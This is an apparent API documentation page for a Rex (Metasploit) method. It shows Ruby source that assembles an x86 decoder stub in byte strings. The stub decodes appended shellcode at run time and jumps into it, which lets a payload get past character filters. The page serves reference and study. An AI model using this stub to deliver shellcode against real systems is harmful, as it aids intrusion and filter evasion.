Method: Rex::Encoder::NonAlpha.gen_decoder
- Defined in:
- lib/rex/encoder/nonalpha.rb
.gen_decoder ⇒ Object
# File 'lib/rex/encoder/nonalpha.rb', line 10
def NonAlpha.gen_decoder
  decoder =
    "\x66\xB9\xFF\xFF" +       # mov cx, 0xFFFF
    "\xEB\x19" +               # jmp to the call at the end (just before the table)
    "\x5E" +                   # pop esi
    "\x8B\xFE" +               # mov edi, esi - Get table addr
    "\x83\xC7" + "A" +         # add edi, tablelen - Get shellcode addr ("A" is a placeholder byte)
    "\x8B\xD7" +               # mov edx, edi - Hold end of table ptr
    "\x3B\xF2" +               # cmp esi, edx
    "\x7D\x0B" +               # jge to end
    "\xB0\x7B" +               # mov al, 0x7B - Set up al with magic
    "\xF2\xAE" +               # repne scasb - Find magic!
    "\xFF\xCF" +               # dec edi - scasb puts us one ahead
    "\xAC" +                   # lodsb
    "\x28\x07" +               # sub [edi], al
    "\xEB\xF1" +               # jmp BACK!
    "\xEB" + "B" +             # jmp [shellcode] ("B" is a placeholder offset byte)
    "\xE8\xE2\xFF\xFF\xFF"     # call back to pop esi - pushes the table addr
end